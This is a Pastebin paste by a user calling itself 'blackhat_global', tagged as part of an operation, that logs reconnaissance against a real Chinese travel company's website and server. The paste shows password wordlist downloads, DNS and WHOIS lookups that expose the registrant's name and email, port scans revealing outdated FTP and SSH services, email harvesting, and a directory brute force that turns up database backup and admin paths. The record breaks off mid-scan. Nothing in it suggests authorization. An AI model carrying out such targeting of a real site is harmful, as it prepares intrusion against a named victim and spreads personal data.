Advertisement
blackhat_global

#Penetration_Testing_In_The_Real_World

Jan 29th, 2020 (edited)
23,490
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 268.72 KB | None | 0 0
  1. /$$ /$$ /$$ /$$ /$$
  2. | $$ | $$ | $$ | $$ | $$
  3. | $$$$$$$ | $$ /$$$$$$ /$$$$$$$| $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$
  4. | $$__ $$| $$ |____ $$ /$$_____/| $$ /$$/| $$__ $$ |____ $$|_ $$_/
  5. | $$ \ $$| $$ /$$$$$$$| $$ | $$$$$$/ | $$ \ $$ /$$$$$$$ | $$
  6. | $$ | $$| $$ /$$__ $$| $$ | $$_ $$ | $$ | $$ /$$__ $$ | $$ /$$
  7. | $$$$$$$/| $$| $$$$$$$| $$$$$$$| $$ \ $$| $$ | $$| $$$$$$$ | $$$$/
  8. |_______/ |__/ \_______/ \_______/|__/ \__/|__/ |__/ \_______/ \___/
  9.  
  10. #Op_Tibet #Tibet #February 2020
  11.  
  12.  
  13. PENETRATION TESTING IN THE REAL WORLD...
  14.  
  15. protonvpn-cli -connect
  16.  
  17. root@blackbox:~# git clone https://github.com/jeanphorn/wordlist.git
  18. root@blackbox:~# cd wordlist/
  19. root@blackbox:~/wordlist# ls
  20. adobe_top100_password.txt passlist.txt router_default_password.md
  21. hydra.restore rdp_passlist.txt ssh_passwd.txt
  22. pass_list.rar README.md usernames.txt
  23.  
  24. TARGET: http://www.etours.cn/
  25. IP ADDRESS: 184.154.192.250
  26.  
  27.  
  28. NSLOOKUP DNS RECORDS A, NS, MX
  29.  
  30. root@blackbox:/# nslookup
  31. > set type=A
  32. > etours.cn
  33. Server: 192.168.1.1
  34. Address: 192.168.1.1#53
  35.  
  36. Non-authoritative answer:
  37. Name: etours.cn
  38. Address: 184.154.192.250
  39.  
  40. > set type=NS
  41. > etours.cn
  42. Server: 192.168.1.1
  43. Address: 192.168.1.1#53
  44.  
  45. Non-authoritative answer:
  46. etours.cn nameserver = ns20.xincache.com.
  47. etours.cn nameserver = ns19.xincache.com.
  48.  
  49. Authoritative answers can be found from:
  50.  
  51. > set type=MX
  52. > etours.cn
  53. Server: 192.168.1.1
  54. Address: 192.168.1.1#53
  55.  
  56. Non-authoritative answer:
  57. etours.cn mail exchanger = 10 mail.etours.cn.
  58.  
  59. Authoritative answers can be found from:
  60. > exit
  61.  
  62.  
  63. DIG DNS RECORDS A, NS, MX
  64.  
  65. root@blackbox:/# dig etours.cn A
  66.  
  67. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn A
  68. ;; global options: +cmd
  69. ;; Got answer:
  70. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12778
  71. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  72.  
  73. ;; OPT PSEUDOSECTION:
  74. ; EDNS: version: 0, flags:; udp: 4096
  75. ;; QUESTION SECTION:
  76. ;etours.cn. IN A
  77.  
  78. ;; ANSWER SECTION:
  79. etours.cn. 2586 IN A 184.154.192.250
  80.  
  81. ;; Query time: 1069 msec
  82. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  83. ;; WHEN: Wed Jan 22 13:34:44 CST 2020
  84. ;; MSG SIZE rcvd: 54
  85.  
  86. root@blackbox:/# dig etours.cn NS
  87.  
  88. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn NS
  89. ;; global options: +cmd
  90. ;; Got answer:
  91. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21169
  92. ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
  93.  
  94. ;; OPT PSEUDOSECTION:
  95. ; EDNS: version: 0, flags:; udp: 4096
  96. ;; QUESTION SECTION:
  97. ;etours.cn. IN NS
  98.  
  99. ;; ANSWER SECTION:
  100. etours.cn. 3506 IN NS ns19.xincache.com.
  101. etours.cn. 3506 IN NS ns20.xincache.com.
  102.  
  103. ;; Query time: 44 msec
  104. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  105. ;; WHEN: Wed Jan 22 13:35:12 CST 2020
  106. ;; MSG SIZE rcvd: 88
  107.  
  108.  
  109. root@blackbox:/# dig etours.cn MX
  110.  
  111. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn MX
  112. ;; global options: +cmd
  113. ;; Got answer:
  114. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37222
  115. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  116.  
  117. ;; OPT PSEUDOSECTION:
  118. ; EDNS: version: 0, flags:; udp: 4096
  119. ;; QUESTION SECTION:
  120. ;etours.cn. IN MX
  121.  
  122. ;; ANSWER SECTION:
  123. etours.cn. 3520 IN MX 10 mail.etours.cn.
  124.  
  125. ;; Query time: 49 msec
  126. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  127. ;; WHEN: Wed Jan 22 13:35:34 CST 2020
  128. ;; MSG SIZE rcvd: 59
  129.  
  130.  
  131. WHOIS DNSLYTICS
  132.  
  133. https://dnslytics.com/whois-lookup/etours.cn
  134.  
  135. WHOIS
  136.  
  137. root@blackbox:/opt# whois etours.cn
  138. Domain Name: etours.cn
  139. ROID: 20040108s10001s00945986-cn
  140. Domain Status: clientUpdateProhibited
  141. Domain Status: clientTransferProhibited
  142. Registrant ID: hr4iv3jdc2gd6
  143. Registrant: 李如勤
  144. Registrant Contact Email: [email protected]
  145. Sponsoring Registrar: 北京新网数码信息技术有限公司
  146. Name Server: ns19.xincache.com
  147. Name Server: ns20.xincache.com
  148. Registration Time: 2004-01-08 15:51:40
  149. Expiration Time: 2029-01-08 15:51:40
  150. DNSSEC: unsigned
  151.  
  152.  
  153. DMITRY IP ADDRESS
  154.  
  155. root@blackbox:/opt# dmitry -winsepfb host 184.154.192.250
  156. Deepmagic Information Gathering Tool
  157. "There be some deep magic going on"
  158.  
  159. HostIP:184.154.192.250
  160. HostName:server.etours.cn
  161.  
  162. Gathered Inet-whois information for 184.154.192.250
  163. ---------------------------------
  164.  
  165.  
  166. inetnum: 180.235.0.0 - 184.255.255.255
  167. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  168. descr: IPv4 address block not managed by the RIPE NCC
  169. remarks: ------------------------------------------------------
  170. remarks:
  171. remarks: For registration information,
  172. remarks: you can consult the following sources:
  173. remarks:
  174. remarks: IANA
  175. remarks: http://www.iana.org/assignments/ipv4-address-space
  176. remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
  177. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
  178. remarks:
  179. remarks: AFRINIC (Africa)
  180. remarks: http://www.afrinic.net/ whois.afrinic.net
  181. remarks:
  182. remarks: APNIC (Asia Pacific)
  183. remarks: http://www.apnic.net/ whois.apnic.net
  184. remarks:
  185. remarks: ARIN (Northern America)
  186. remarks: http://www.arin.net/ whois.arin.net
  187. remarks:
  188. remarks: LACNIC (Latin America and the Carribean)
  189. remarks: http://www.lacnic.net/ whois.lacnic.net
  190. remarks:
  191. remarks: ------------------------------------------------------
  192. country: EU # Country is really world wide
  193. admin-c: IANA1-RIPE
  194. tech-c: IANA1-RIPE
  195. status: ALLOCATED UNSPECIFIED
  196. mnt-by: RIPE-NCC-HM-MNT
  197. created: 2019-01-07T10:49:46Z
  198. last-modified: 2019-01-07T10:49:46Z
  199. source: RIPE
  200.  
  201. role: Internet Assigned Numbers Authority
  202. address: see http://www.iana.org.
  203. admin-c: IANA1-RIPE
  204. tech-c: IANA1-RIPE
  205. nic-hdl: IANA1-RIPE
  206. remarks: For more information on IANA services
  207. remarks: go to IANA web site at http://www.iana.org.
  208. mnt-by: RIPE-NCC-MNT
  209. created: 1970-01-01T00:00:00Z
  210. last-modified: 2001-09-22T09:31:27Z
  211. source: RIPE # Filtered
  212.  
  213. % This query was served by the RIPE Database Query Service version 1.96 (ANGUS)
  214.  
  215.  
  216.  
  217. Gathered Inic-whois information for server.etours.cn
  218. ---------------------------------
  219.  
  220. Gathered Netcraft information for server.etours.cn
  221. ---------------------------------
  222.  
  223. Retrieving Netcraft.com information for server.etours.cn
  224. Netcraft.com Information gathered
  225.  
  226. Gathered Subdomain information for server.etours.cn
  227. ---------------------------------
  228. Searching Google.com:80...
  229. Searching Altavista.com:80...
  230. Found 0 possible subdomain(s) for host server.etours.cn, Searched 0 pages containing 0 results
  231.  
  232. Gathered E-Mail information for server.etours.cn
  233. ---------------------------------
  234. Searching Google.com:80...
  235. Searching Altavista.com:80...
  236. Found 0 E-Mail(s) for host server.etours.cn, Searched 0 pages containing 0 results
  237.  
  238. Gathered TCP Port information for 184.154.192.250
  239. ---------------------------------
  240.  
  241. Port State
  242.  
  243. 21/tcp open
  244. >> 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  245.  
  246. 22/tcp open
  247. >> SSH-2.0-OpenSSH_4.3
  248.  
  249. 25/tcp open
  250. >> 220 server.etours.cn ESMTP
  251.  
  252. 53/tcp open
  253.  
  254. Portscan Finished: Scanned 150 ports, 145 ports were in state closed
  255.  
  256.  
  257. All scans completed, exiting
  258.  
  259. DMITRY DOMAIN
  260.  
  261. root@blackbox:/opt# dmitry -winsepfb host etours.cn
  262. Deepmagic Information Gathering Tool
  263. "There be some deep magic going on"
  264.  
  265. HostIP:184.154.192.250
  266. HostName:etours.cn
  267.  
  268. Gathered Inet-whois information for 184.154.192.250
  269. ---------------------------------
  270.  
  271.  
  272. inetnum: 180.235.0.0 - 184.255.255.255
  273. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  274. descr: IPv4 address block not managed by the RIPE NCC
  275. remarks: ------------------------------------------------------
  276. remarks:
  277. remarks: For registration information,
  278. remarks: you can consult the following sources:
  279. remarks:
  280. remarks: IANA
  281. remarks: http://www.iana.org/assignments/ipv4-address-space
  282. remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
  283. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
  284. remarks:
  285. remarks: AFRINIC (Africa)
  286. remarks: http://www.afrinic.net/ whois.afrinic.net
  287. remarks:
  288. remarks: APNIC (Asia Pacific)
  289. remarks: http://www.apnic.net/ whois.apnic.net
  290. remarks:
  291. remarks: ARIN (Northern America)
  292. remarks: http://www.arin.net/ whois.arin.net
  293. remarks:
  294. remarks: LACNIC (Latin America and the Carribean)
  295. remarks: http://www.lacnic.net/ whois.lacnic.net
  296. remarks:
  297. remarks: ------------------------------------------------------
  298. country: EU # Country is really world wide
  299. admin-c: IANA1-RIPE
  300. tech-c: IANA1-RIPE
  301. status: ALLOCATED UNSPECIFIED
  302. mnt-by: RIPE-NCC-HM-MNT
  303. created: 2019-01-07T10:49:46Z
  304. last-modified: 2019-01-07T10:49:46Z
  305. source: RIPE
  306.  
  307. role: Internet Assigned Numbers Authority
  308. address: see http://www.iana.org.
  309. admin-c: IANA1-RIPE
  310. tech-c: IANA1-RIPE
  311. nic-hdl: IANA1-RIPE
  312. remarks: For more information on IANA services
  313. remarks: go to IANA web site at http://www.iana.org.
  314. mnt-by: RIPE-NCC-MNT
  315. created: 1970-01-01T00:00:00Z
  316. last-modified: 2001-09-22T09:31:27Z
  317. source: RIPE # Filtered
  318.  
  319. % This query was served by the RIPE Database Query Service version 1.96 (WAGYU)
  320.  
  321.  
  322.  
  323. Gathered Inic-whois information for etours.cn
  324. ---------------------------------
  325. Domain Name: etours.cn
  326. ROID: 20040108s10001s00945986-cn
  327. Domain Status: clientUpdateProhibited
  328. Domain Status: clientTransferProhibited
  329. Registrant ID: hr4iv3jdc2gd6
  330. Registrant: 李如勤
  331. Registrant Contact Email: [email protected]
  332. Sponsoring Registrar: 北京新网数码信息技术有限公司
  333. Name Server: ns19.xincache.com
  334. Name Server: ns20.xincache.com
  335. Registration Time: 2004-01-08 15:51:40
  336. Expiration Time: 2029-01-08 15:51:40
  337. DNSSEC: unsigned
  338.  
  339. Gathered Netcraft information for etours.cn
  340. ---------------------------------
  341.  
  342. Retrieving Netcraft.com information for etours.cn
  343. Netcraft.com Information gathered
  344.  
  345. Gathered Subdomain information for etours.cn
  346. ---------------------------------
  347. Searching Google.com:80...
  348. HostName:www.etours.cn
  349. HostIP:184.154.192.250
  350. HostName:beijing.etours.cn
  351. HostIP:184.154.192.250
  352. Searching Altavista.com:80...
  353. Found 2 possible subdomain(s) for host etours.cn, Searched 0 pages containing 0 results
  354.  
  355. Gathered E-Mail information for etours.cn
  356. ---------------------------------
  357. Searching Google.com:80...
  358. Searching Altavista.com:80...
  359. Found 0 E-Mail(s) for host etours.cn, Searched 0 pages containing 0 results
  360.  
  361. Gathered TCP Port information for 184.154.192.250
  362. ---------------------------------
  363.  
  364. Port State
  365.  
  366. 21/tcp open
  367. >> 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  368.  
  369. 22/tcp open
  370. >> SSH-2.0-OpenSSH_4.3
  371.  
  372. 25/tcp open
  373. >> 220 server.etours.cn ESMTP
  374.  
  375. 53/tcp open
  376.  
  377. Portscan Finished: Scanned 150 ports, 145 ports were in state closed
  378.  
  379.  
  380. All scans completed, exiting
  381.  
  382.  
  383.  
  384. SHODAN CHECK
  385.  
  386. https://www.shodan.io/host/184.154.192.250/raw
  387.  
  388.  
  389. SEND A GET REQUEST
  390.  
  391. chrome-extension://aejoelaoggembcahagimdiliamlcdmfm/index.html
  392.  
  393. GET / HTTP/1.1
  394. Host: 184.154.192.250
  395.  
  396. HTTP/1.1 200 OK
  397. Date: Wed, 22 Jan 2020 19:57:07 GMT
  398. Server: Apache
  399. X-Powered-By: PleskLin
  400. Connection: close
  401. Transfer-Encoding: chunked
  402. Content-Type: text/html
  403.  
  404. Tel: (+86) 10 67160201 ext 1006, 1007
  405. Fax: (+86) 10 67160150 67160130
  406. Add: 2001-1-1,Linghangguoji, Guangqumen, Dongcheng Dist, Beijing, China<br>
  407. License No.L-BJ-01220
  408.  
  409.  
  410. TEST EMAIL ADDRESS
  411.  
  412. https://dnslytics.com/email-test
  413.  
  414.  
  415. Testing e-mail address: [email protected]
  416. Number of mail server: 1
  417. Mail server Details Status
  418. mail.etours.cn
  419. Checking server mail.etours.cn...
  420.  
  421. Opening up socket to mail.etours.cn... Succes!
  422.  
  423. mail.etours.cn replied:
  424. HELO www.dnslytics.com
  425. (7002.86 ms)
  426. MAIL FROM: <[email protected]>
  427. (7007.18 ms)
  428. RCPT TO: <[email protected]>
  429. (7007.18 ms)
  430. QUIT
  431. (7007.12 ms)
  432. Successful communication with mail.etours.cn assuming OKsuccess
  433.  
  434.  
  435. OK success
  436. Email delivery for [email protected] is successful for all mail servers!
  437.  
  438.  
  439. TRANSLATE REGISTRANT NAME:
  440.  
  441. 李如勤 = Li Ruqin
  442.  
  443.  
  444. EMAIL HARVESTER
  445.  
  446. root@blackbox:/# cd /opt/
  447. root@blackbox:/opt# git clone https://github.com/laramies/theHarvester.git
  448. root@blackbox:/opt# cd theHarvester/
  449. root@blackbox:/opt/theHarvester# pip3 install -r requirements.txt
  450. root@blackbox:/opt/theHarvester# ./theHarvester.py -d etours.cn -l 500 -b all
  451.  
  452. *******************************************************************
  453. * _ _ _ *
  454. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  455. * | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  456. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  457. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  458. * *
  459. * theHarvester 3.1.1dev3 *
  460. * Coded by Christian Martorella *
  461. * Edge-Security Research *
  462. * *
  463. *******************************************************************
  464.  
  465.  
  466. [*] Target: etours.cn
  467.  
  468.  
  469. [*] IPs found: 14
  470. -------------------
  471. 8.5.1.33
  472. 34.212.104.30
  473. 45.204.167.102
  474. 50.63.202.16
  475. 52.84.3.40
  476. 52.84.3.100
  477. 52.84.3.239
  478. 52.84.3.252
  479. 52.84.64.42
  480. 104.27.138.30
  481. 104.27.139.30
  482. 124.16.31.152
  483. 154.222.178.247
  484. 184.154.192.250
  485.  
  486. [*] Emails found: 1
  487. ----------------------
  488.  
  489.  
  490. https://dnslytics.com/email-test
  491.  
  492. Testing e-mail address: [email protected]
  493. Number of mail server: 1
  494. Mail server Details Status
  495. mail.etours.cn
  496. Checking server mail.etours.cn...
  497.  
  498. Opening up socket to mail.etours.cn... Succes!
  499.  
  500. mail.etours.cn replied:
  501. HELO www.dnslytics.com
  502. (7002.05 ms)
  503. MAIL FROM: <[email protected]>
  504. (7003.72 ms)
  505. RCPT TO: <[email protected]>
  506. (7007.17 ms)
  507. QUIT
  508. (7004.80 ms)
  509. Successful communication with mail.etours.cn assuming OKsuccess
  510.  
  511.  
  512. OK success
  513. Email delivery for [email protected] is successful for all mail servers!
  514.  
  515.  
  516.  
  517. [*] Hosts found: 46
  518. ---------------------
  519. beijing.etours.cn:184.154.192.250
  520. c-domain__target--beijing.etours.cn:
  521. c-domain__target--mail.etours.cn:
  522. changdetours.cn:
  523. chinawinetours.cn:184.168.131.241
  524. dragongatetours.cn:104.27.139.30, 104.27.138.30
  525. etours.cn:184.154.192.250
  526. httpacnow.netbeijing.etours.cn:
  527. httpacnow.netwww.etours.cn:
  528. httpbeijing.etours.cn:
  529. httpsseo.5118.combeijing.etours.cn:
  530. httpswww.keyword-suggest-tool.comsearchbeijing.etours.cn:
  531. httpwww.etours.cn:
  532. mail.etours.cn:184.154.192.250
  533. seetours.cn:
  534. server.etours.cn:
  535. taketours.cn:34.212.104.30
  536. www.3etours.cn:122.10.82.47, 103.97.19.67
  537. www.beijing.etours.cn:
  538. www.dragongatetours.cn:104.27.138.30, 104.27.139.30
  539. www.etours.cn:184.154.192.250
  540. www.lovetours.cn:154.222.178.247
  541. www.seetours.cn:2.16.135.32, 2.16.135.42
  542. www.taketours.cn:34.212.104.30
  543.  
  544.  
  545. WHATRUNS 184.154.192.250
  546.  
  547. https://www.whatruns.com/website/etours.cn
  548.  
  549. Hosting Panel
  550. Plesk
  551.  
  552. Programming Language
  553. PHP 5.3.10
  554.  
  555. Web Server
  556. Apache 2.4.6
  557.  
  558.  
  559. WHATWEB
  560.  
  561. root@blackbox:~/WhatWeb# ./whatweb
  562.  
  563. .$$$ $. .$$$ $.
  564. $$$$ $$. .$$$ $$$ .$$$$$$. .$$$$$$$$$$. $$$$ $$. .$$$$$$$. .$$$$$$.
  565. $ $$ $$$ $ $$ $$$ $ $$$$$$. $$$$$ $$$$$$ $ $$ $$$ $ $$ $$ $ $$$$$$.
  566. $ `$ $$$ $ `$ $$$ $ `$ $$$ $$' $ `$ `$$ $ `$ $$$ $ `$ $ `$ $$$'
  567. $. $ $$$ $. $$$$$$ $. $$$$$$ `$ $. $ :' $. $ $$$ $. $$$$ $. $$$$$.
  568. $::$ . $$$ $::$ $$$ $::$ $$$ $::$ $::$ . $$$ $::$ $::$ $$$$
  569. $;;$ $$$ $$$ $;;$ $$$ $;;$ $$$ $;;$ $;;$ $$$ $$$ $;;$ $;;$ $$$$
  570. $$$$$$ $$$$$ $$$$ $$$ $$$$ $$$ $$$$ $$$$$$ $$$$$ $$$$$$$$$ $$$$$$$$$'
  571.  
  572.  
  573. WhatWeb - Next generation web scanner version 0.5.1.
  574. Developed by Andrew Horton (urbanadventurer) and Brendan Coles (bcoles)
  575. Homepage: https://www.morningstarsecurity.com/research/whatweb
  576.  
  577.  
  578. root@blackbox:~# git clone https://github.com/urbanadventurer/WhatWeb.git
  579.  
  580. root@blackbox:~/WhatWeb# ./whatweb -v -a 4 etours.cn
  581.  
  582. WhatWeb report for http://www.etours.cn/
  583. Status : 200 OK
  584. Title : China Travel Service, China Tours, China Travel - China eTours Travel Service
  585. IP : 184.154.192.250
  586. Country : UNITED STATES, US
  587.  
  588. Summary : Script[text/javascript], Meta-Author[www.eTours.cn], HTTPServer[Apache], JQuery[1.4.2], Plesk[Lin], Email[[email protected]], Apache, X-Powered-By[PleskLin]
  589.  
  590. Detected Plugins:
  591. [ Apache ]
  592. The Apache HTTP Server Project is an effort to develop and
  593. maintain an open-source HTTP server for modern operating
  594. systems including UNIX and Windows NT. The goal of this
  595. project is to provide a secure, efficient and extensible
  596. server that provides HTTP services in sync with the current
  597. HTTP standards.
  598.  
  599. Google Dorks: (3)
  600. Website : http://httpd.apache.org/
  601.  
  602. [ Email ]
  603. Extract email addresses. Find valid email address and
  604. syntactically invalid email addresses from mailto: link
  605. tags. We match syntactically invalid links containing
  606. mailto: to catch anti-spam email addresses, eg. bob at
  607. gmail.com. This uses the simplified email regular
  608. expression from
  609. http://www.regular-expressions.info/email.html for valid
  610. email address matching.
  611.  
  612.  
  613. [ HTTPServer ]
  614. HTTP server header string. This plugin also attempts to
  615. identify the operating system from the server header.
  616.  
  617. String : Apache (from server string)
  618.  
  619. [ JQuery ]
  620. A fast, concise, JavaScript that simplifies how to traverse
  621. HTML documents, handle events, perform animations, and add
  622. AJAX.
  623.  
  624. Version : 1.4.2
  625. Website : http://jquery.com/
  626.  
  627. [ Meta-Author ]
  628. This plugin retrieves the author name from the meta name
  629. tag - info:
  630. http://www.webmarketingnow.com/tips/meta-tags-uncovered.html
  631. #author
  632.  
  633. String : www.eTours.cn
  634.  
  635. [ Plesk ]
  636. Plesk is a web control panel
  637.  
  638. String : Lin
  639. Google Dorks: (1)
  640. Website : http://www.parallels.com/products/plesk/
  641.  
  642. [ Script ]
  643. This plugin detects instances of script HTML elements and
  644. returns the script language/type.
  645.  
  646. String : text/javascript
  647.  
  648. [ X-Powered-By ]
  649. X-Powered-By HTTP header
  650.  
  651. String : PleskLin (from x-powered-by string)
  652.  
  653. HTTP Headers:
  654. HTTP/1.1 200 OK
  655. Date: Thu, 23 Jan 2020 15:47:15 GMT
  656. Server: Apache
  657. X-Powered-By: PleskLin
  658. Connection: close
  659. Transfer-Encoding: chunked
  660. Content-Type: text/html
  661.  
  662.  
  663.  
  664. root@blackbox:/opt# dirb http://184.154.192.250/ /usr/share/wordlists/dirb/common.txt
  665.  
  666. -----------------
  667. DIRB v2.22
  668. By The Dark Raver
  669. -----------------
  670.  
  671. START_TIME: Wed Jan 22 15:18:24 2020
  672. URL_BASE: http://184.154.192.250/
  673. WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
  674.  
  675.  
  676. HTTP STATUS CODES:
  677.  
  678.  
  679. https://miro.medium.com/max/1530/0*BX8QCIGzEMtRvoJN.png
  680.  
  681. CODE - STATUS
  682. 200 - OK
  683. 301 - MOVED PERMANENTLY
  684. 302 - FOUND
  685. 401 - UNAUTHORIZED
  686. 403 - FORBIDDEN
  687. 500 - Internal Server Error
  688.  
  689.  
  690. -----------------
  691.  
  692. GENERATED WORDS: 4612
  693.  
  694. ---- Scanning URL: http://184.154.192.250/ ----
  695. + http://184.154.192.250/_db_backups (CODE:401|SIZE:1211)
  696. + http://184.154.192.250/admin.pl (CODE:403|SIZE:954)
  697. + http://184.154.192.250/atom (CODE:301|SIZE:0)
  698. + http://184.154.192.250/cgi-bin/ (CODE:403|SIZE:954)
  699. + http://184.154.192.250/favicon.ico (CODE:200|SIZE:0)
  700. + http://184.154.192.250/index.php (CODE:200|SIZE:19887)
  701. + http://184.154.192.250/page1 (CODE:301|SIZE:0)
  702. + http://184.154.192.250/page2 (CODE:301|SIZE:0)
  703. + http://184.154.192.250/php.ini (CODE:200|SIZE:389)
  704. + http://184.154.192.250/plesk-stat (CODE:301|SIZE:301)
  705. + http://184.154.192.250/rdf (CODE:301|SIZE:0)
  706. + http://184.154.192.250/rss (CODE:301|SIZE:0)
  707. + http://184.154.192.250/rss2 (CODE:301|SIZE:0)
  708. + http://184.154.192.250/sitemap.xml (CODE:200|SIZE:78004)
  709. + http://184.154.192.250/usage (CODE:403|SIZE:954)
  710. + http://184.154.192.250/web.xml (CODE:200|SIZE:679)
  711. + http://184.154.192.250/webstat (CODE:301|SIZE:298)
  712.  
  713. ---- Entering directory: http://184.154.192.250/0/ ----
  714. + http://184.154.192.250/0/index.php (CODE:301|SIZE:0)
  715.  
  716. ---- Entering directory: http://184.154.192.250/2011/ ----
  717. + http://184.154.192.250/2011/13 (CODE:200|SIZE:13756)
  718. + http://184.154.192.250/2011/14 (CODE:200|SIZE:13756)
  719. + http://184.154.192.250/2011/15 (CODE:200|SIZE:13756)
  720. + http://184.154.192.250/2011/20 (CODE:200|SIZE:13756)
  721. + http://184.154.192.250/2011/21 (CODE:200|SIZE:13756)
  722. + http://184.154.192.250/2011/22 (CODE:200|SIZE:13756)
  723. + http://184.154.192.250/2011/23 (CODE:200|SIZE:13756)
  724. + http://184.154.192.250/2011/24 (CODE:200|SIZE:13756)
  725. + http://184.154.192.250/2011/25 (CODE:200|SIZE:13756)
  726. + http://184.154.192.250/2011/30 (CODE:200|SIZE:13756)
  727. + http://184.154.192.250/2011/32 (CODE:200|SIZE:13756)
  728. + http://184.154.192.250/2011/42 (CODE:200|SIZE:13756)
  729. + http://184.154.192.250/2011/50 (CODE:200|SIZE:13756)
  730. + http://184.154.192.250/2011/51 (CODE:200|SIZE:13756)
  731. + http://184.154.192.250/2011/64 (CODE:200|SIZE:13756)
  732. + http://184.154.192.250/2011/96 (CODE:200|SIZE:13756)
  733. + http://184.154.192.250/2011/atom (CODE:301|SIZE:0)
  734. + http://184.154.192.250/2011/index.php (CODE:301|SIZE:0)
  735. + http://184.154.192.250/2011/page1 (CODE:301|SIZE:0)
  736. + http://184.154.192.250/2011/page2 (CODE:301|SIZE:0)
  737. + http://184.154.192.250/2011/rdf (CODE:301|SIZE:0)
  738. + http://184.154.192.250/2011/rss (CODE:301|SIZE:0)
  739. + http://184.154.192.250/2011/rss2 (CODE:301|SIZE:0)
  740.  
  741. ---- Entering directory: http://184.154.192.250/2012/ ----
  742. + http://184.154.192.250/2012/13 (CODE:200|SIZE:13756)
  743. + http://184.154.192.250/2012/14 (CODE:200|SIZE:13756)
  744. + http://184.154.192.250/2012/15 (CODE:200|SIZE:13756)
  745. + http://184.154.192.250/2012/20 (CODE:200|SIZE:13756)
  746. + http://184.154.192.250/2012/21 (CODE:200|SIZE:13756)
  747. + http://184.154.192.250/2012/22 (CODE:200|SIZE:13756)
  748. + http://184.154.192.250/2012/23 (CODE:200|SIZE:13756)
  749. + http://184.154.192.250/2012/24 (CODE:200|SIZE:13756)
  750. + http://184.154.192.250/2012/25 (CODE:200|SIZE:13756)
  751. + http://184.154.192.250/2012/30 (CODE:200|SIZE:13756)
  752. + http://184.154.192.250/2012/32 (CODE:200|SIZE:13756)
  753. + http://184.154.192.250/2012/42 (CODE:200|SIZE:13756)
  754. + http://184.154.192.250/2012/50 (CODE:200|SIZE:13756)
  755. + http://184.154.192.250/2012/51 (CODE:200|SIZE:13756)
  756. + http://184.154.192.250/2012/64 (CODE:200|SIZE:13756)
  757. + http://184.154.192.250/2012/96 (CODE:200|SIZE:13756)
  758. + http://184.154.192.250/2012/atom (CODE:301|SIZE:0)
  759. + http://184.154.192.250/2012/index.php (CODE:301|SIZE:0)
  760. + http://184.154.192.250/2012/page1 (CODE:301|SIZE:0)
  761. + http://184.154.192.250/2012/page2 (CODE:301|SIZE:0)
  762. + http://184.154.192.250/2012/rdf (CODE:301|SIZE:0)
  763. + http://184.154.192.250/2012/rss (CODE:301|SIZE:0)
  764. + http://184.154.192.250/2012/rss2 (CODE:301|SIZE:0)
  765.  
  766. ---- Entering directory: http://184.154.192.250/about_us/ ----
  767. + http://184.154.192.250/about_us/admin.pl (CODE:403|SIZE:954)
  768. + http://184.154.192.250/about_us/index.php (CODE:200|SIZE:31320)
  769.  
  770. ---- Entering directory: http://184.154.192.250/ads/ ----
  771. + http://184.154.192.250/ads/admin.pl (CODE:403|SIZE:954)
  772. + http://184.154.192.250/ads/index.php (CODE:301|SIZE:0)
  773.  
  774. ---- Entering directory: http://184.154.192.250/backup/ ----
  775. + http://184.154.192.250/backup/admin.pl (CODE:403|SIZE:954)
  776. + http://184.154.192.250/backup/index.php (CODE:301|SIZE:0)
  777.  
  778. ---- Entering directory: http://184.154.192.250/blog/ ----
  779. + http://184.154.192.250/blog/admin (CODE:302|SIZE:0)
  780. + http://184.154.192.250/blog/admin.pl (CODE:403|SIZE:954)
  781. + http://184.154.192.250/blog/atom (CODE:301|SIZE:0)
  782. + http://184.154.192.250/blog/dashboard (CODE:302|SIZE:0)
  783. + http://184.154.192.250/blog/index.php (CODE:301|SIZE:0)
  784. + http://184.154.192.250/blog/login (CODE:302|SIZE:0)
  785. + http://184.154.192.250/blog/page1 (CODE:301|SIZE:0)
  786. + http://184.154.192.250/blog/page2 (CODE:301|SIZE:0)
  787. + http://184.154.192.250/blog/rdf (CODE:301|SIZE:0)
  788. + http://184.154.192.250/blog/rss (CODE:301|SIZE:0)
  789. + http://184.154.192.250/blog/rss2 (CODE:301|SIZE:0)
  790. + http://184.154.192.250/blog/xmlrpc.php (CODE:405|SIZE:42)
  791.  
  792. ---- Entering directory: http://184.154.192.250/Blog/ ----
  793. + http://184.154.192.250/Blog/atom (CODE:301|SIZE:0)
  794. + http://184.154.192.250/Blog/index.php (CODE:301|SIZE:0)
  795. + http://184.154.192.250/Blog/page1 (CODE:301|SIZE:0)
  796. + http://184.154.192.250/Blog/page2 (CODE:301|SIZE:0)
  797. + http://184.154.192.250/Blog/rdf (CODE:301|SIZE:0)
  798. + http://184.154.192.250/Blog/rss (CODE:301|SIZE:0)
  799. + http://184.154.192.250/Blog/rss2 (CODE:301|SIZE:0)
  800.  
  801. ---- Entering directory: http://184.154.192.250/cgi/ ----
